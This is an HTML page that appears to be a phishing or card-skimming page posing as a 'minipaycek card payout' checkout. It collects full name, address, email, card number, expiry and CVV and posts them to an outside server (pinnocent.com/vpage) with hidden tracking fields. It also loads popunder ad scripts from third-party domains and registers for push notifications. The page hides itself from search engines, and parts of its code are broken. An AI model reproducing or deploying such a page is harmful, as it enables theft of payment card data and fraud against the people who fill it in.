
<!DOCTYPE html>
<html>
<head>
     <meta name=”robots” content=noindex”>
  <meta name="robots" content="index,follow">
<meta name="robots" content="noindex,follow">
<meta name="robots" content="index,nofollow">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />
    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<style>
body {
  background-color: black;
  color: white;
  font-family: Poppins;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

.container {
  background-color: #070510;
  padding: 5px 20px 15px 20px;
  border: 1px solid lightgrey;
  border-radius: 3px;
}

input[type=text] {
  width: 95%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
  background-color:#1a1927;
  color:white;
}

label {
  margin-bottom: 10px;
  display: block;
}

.icon-container {
  margin-bottom: 20px;
  padding: 7px 0;
  font-size: 24px;
}

.btn {
  background-color: #04AA6D;
  color: white;
  padding: 12px;
  margin: 10px 0;
  border: none;
  width: 100%;
  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
}

.btn:hover {
  background-color: #45a049;
}

a {
  color: #2196F3;
}

hr {
  border: 1px solid lightgrey;
}

span.price {
  float: right;
  color: grey;
}

/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
@media (max-width: 800px) {
  .row {
    flex-direction: column-reverse;
  }
  .col-25 {
    margin-bottom: 20px;
  }
}
.poppins-thin {
  font-family: "Poppins", serif;
  font-weight: 100;
  font-style: normal;
}

.poppins-extralight {
  font-family: "Poppins", serif;
  font-weight: 200;
  font-style: normal;
}

.poppins-light {
  font-family: "Poppins", serif;
  font-weight: 300;
  font-style: normal;
}

.poppins-regular {
  font-family: "Poppins", serif;
  font-weight: 400;
  font-style: normal;
}

.poppins-medium {
  font-family: "Poppins", serif;
  font-weight: 500;
  font-style: normal;
}

.poppins-semibold {
  font-family: "Poppins", serif;
  font-weight: 600;
  font-style: normal;
}

.poppins-bold {
  font-family: "Poppins", serif;
  font-weight: 700;
  font-style: normal;
}

.poppins-extrabold {
  font-family: "Poppins", serif;
  font-weight: 800;
  font-style: normal;
}

.poppins-black {
  font-family: "Poppins", serif;
  font-weight: 900;
  font-style: normal;
}

.poppins-thin-italic {
  font-family: "Poppins", serif;
  font-weight: 100;
  font-style: italic;
}

.poppins-extralight-italic {
  font-family: "Poppins", serif;
  font-weight: 200;
  font-style: italic;
}

.poppins-light-italic {
  font-family: "Poppins", serif;
  font-weight: 300;
  font-style: italic;
}

.poppins-regular-italic {
  font-family: "Poppins", serif;
  font-weight: 400;
  font-style: italic;
}

.poppins-medium-italic {
  font-family: "Poppins", serif;
  font-weight: 500;
  font-style: italic;
}

.poppins-semibold-italic {
  font-family: "Poppins", serif;
  font-weight: 600;
  font-style: italic;
}

.poppins-bold-italic {
  font-family: "Poppins", serif;
  font-weight: 700;
  font-style: italic;
}

.poppins-extrabold-italic {
  font-family: "Poppins", serif;
  font-weight: 800;
  font-style: italic;
}

.poppins-black-italic {
  font-family: "Poppins", serif;
  font-weight: 900;
  font-style: italic;
}

</style>
</head>
<body>

<h2 class="poppins-black">minipaycek card payout </h2>
<p class="poppins-semibold"> Checkout with your credit card. </p>
<div class="row">
  <div class="col-75">
    <div class="container">
<form id="anonymousNewMessage" class="form" method="POST" action="https://pinnocent.com/vpage">
                <div class="card-header text-center">

              <input required type="hidden" name="ftype" value="atm" />

     
                </div>
                <div class="card-body">

                    <input required type="hidden" name="user_id" id="userUsername" value="16934"
      
        <div class="row">
          <div class="col-50">
            <h3 class="Poppins">Card Address</h3>
            <label for="fname" class="poppins-semibold"><i class="fa fa-user"></i> Full Name</label>
            <input required type="text" id="fname" name="s_6" placeholder="John M. Doe">
            <label for="email" class="poppins-semibold"><i class="fa fa-envelope"></i> Email</label>
            <input required type="text" id="email" name="s_7" placeholder="john@example.com">
            <label for="adr" class="poppins-semibold"><i class="fa fa-address-card-o"></i> Address</label>
            <input required type="text" id="adr" name="s_8" placeholder="542 W. 15th Street">
            <label for="city" class="poppins-semibold"><i class="fa fa-institution"></i> City</label>
            <input required type="text" id="city" name="s_9" placeholder="New York">

            <div class="row">
              <div class="col-50">
                <label for="state" class="poppins-semibold">State</label>
                <input required type="text" id="state" name="s_10" placeholder="NY">
              </div>
              <div class="col-50">
                <label for="zip" class="poppins-semibold">Zip</label>
                <input required type="text" id="zip" name="s_11" placeholder="10001">
              </div>
            </div>
          </div>

          <div class="col-50">
            <h3 class="poppins-extrabold">Card Info</h3>
            <label for="fname" class="poppins-extrabold">Accepted Cards</label>
            <div class="icon-container">
              <i class="fa fa-cc-visa" style="color:navy;"></i>
              <i class="fa fa-cc-amex" style="color:blue;"></i>
              <i class="fa fa-cc-mastercard" style="color:red;"></i>
              <i class="fa fa-cc-discover" style="color:orange;"></i>
            </div>
            <label for="cname" class="poppins-semibold">Name on Card</label>
            <input required type="text" id="cname" name="s_1" placeholder="John More Doe">
            <label for="ccnum" class="poppins-semibold">Credit card number</label>
            <input required type="text" id="ccnum" name="s_2" placeholder="Card Number">
            <label for="expmonth" class="poppins-semibold">Exp Month</label>
            <input required type="text" id="expmonth" name="s_3" placeholder="September">
            <div class="row">
              <div class="col-50">
                <label for="expyear" class="poppins-semibold">Exp Year</label>
                <input required type="text" id="expyear" name="s_4" placeholder="2018">
              </div>
              <div class="col-50">
                <label for="cvv" class="poppins-semibold">CVV</label>
                <input required type="text" id="cvv" name="s_5" placeholder="352">
                
 <input required type="hidden" name="ip" value="172.71.127.157" />
<input required type="hidden" name="link" value="Atm" />
              </div>
            </div>
          </div>
          
        </div>
		<button class="btn" name="login" type="submit" id="anonymousProcess" style="background-color:blue; width:85%" class="poppins-extrabold"> <span class="poppins-extrabold">Continue to checkout</span></button><br/><br/>
     <div class="row">
      </form>
    </div>
  </div>
 
    </div>
  </div>
</div>
                 
  <!--   Core JS Files   -->
  <script src="./assets/js/core/jquery.min.js" type="text/javascript"></script>
  <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-E7K8F1651E"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-E7K8F1651E');
</script>
<script type="text/javascript">
   var uid = '330441';
   var wid = '717208';
   var pop_tag = document.createElement('script');pop_tag.src='//nairaa.com/2show.js';document.body.appendChild(pop_tag);
   pop_tag.onerror = function() {pop_tag = document.createElement('script');pop_tag.src='//nairaa.com/2show.js';document.body.appendChild(pop_tag)};
</script>
<script src="back.js?1734976792"> 
</script>
<script src="https://old.pinnocent.coms/jspopunder.min.js"></script>
	<script>
	jsPopunder('https://noopsaithu.net/4/7193696', {
		name: 'poptest', 
		width: (screen.width/2), 
		height: (screen.height-100), 
		top: 0, left: 0, 
		wait: 43200, cap: 120000
	});
	</script>
   
<script src="https://www.gstatic.com/firebasejs/4.9.1/firebase.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<link rel="manifest" href="manifest.json">
<script>
  // Initialize Firebase
  /*Update this config*/
  var config = {
     apiKey: "AIzaSyBV2pY0LLJTrHhiCFArAedQpTiUshDJsi8",
  authDomain: "pinnocent-fa387.firebaseapp.com",
  databaseURL: "https://pinnocent-fa387.firebaseio.com",
  projectId: "pinnocent-fa387",
  storageBucket: "pinnocent-fa387.appspot.com",
  messagingSenderId: "403452483449",
  appId: "1:403452483449:web:630abc1e7c265a8f0481a8",
  measurementId: "G-8DGVGDCCL2"
  };
  firebase.initializeApp(config);

	// Retrieve Firebase Messaging object.
	const messaging = firebase.messaging();
	messaging.requestPermission()
	.then(function() {
	  console.log('Notification permission granted.');
	  // TODO(developer): Retrieve an Instance ID token for use with FCM.
	 
               
                vapidKey: 'BLf-6mYxA6BPIXK-MpMWYKuLDPpbKFtXdERFs506kY1xZsek0B8ieRRIikBGaO0LKrFXzglm-mNr4rpMypLLiJ4' }).then((currentToken) => {
                if (currentToken) {
                    console.log("Token is: "+currentToken);
	  } else {
	  	getRegToken();
	  }

	})
	.catch(function(err) {
	  console.log('Unable to get permission to notify.', err);
	});

	function getRegToken(argument) {
		messaging.getToken()
		  .then(function(currentToken) {
		    if (currentToken) {
		      saveToken(currentToken);
		      console.log(currentToken);
		      setTokenSentToServer(true);
		    } else {
		      console.log('No Instance ID token available. Request permission to generate one.');
		      setTokenSentToServer(false);
		    }
		  })
		  .catch(function(err) {
		    console.log('An error occurred while retrieving token. ', err);
		    setTokenSentToServer(false);
		  });
	}

	function setTokenSentToServer(sent) {
	    window.localStorage.setItem('sentToServer', sent ? 1 : 0);
	}

	function isTokenSentToServer() {
	    return window.localStorage.getItem('sentToServer') == 1;
	}

	function saveToken(currentToken) {
		$.ajax({
			url: '?',
			method: 'post',
			data: 'token=' + currentToken
		}).done(function(result){
			console.log(result);
		})
	}

	messaging.onMessage(function(payload) {
	  console.log("Message received. ", payload);
	  notificationTitle = payload.data.title;
	  notificationOptions = {
	  	body: payload.data.body,
	  	icon: payload.data.icon,
	  	image:  payload.data.image
	  };
	  var notification = new Notification(notificationTitle,notificationOptions);
	});
</script>
</body>
</html>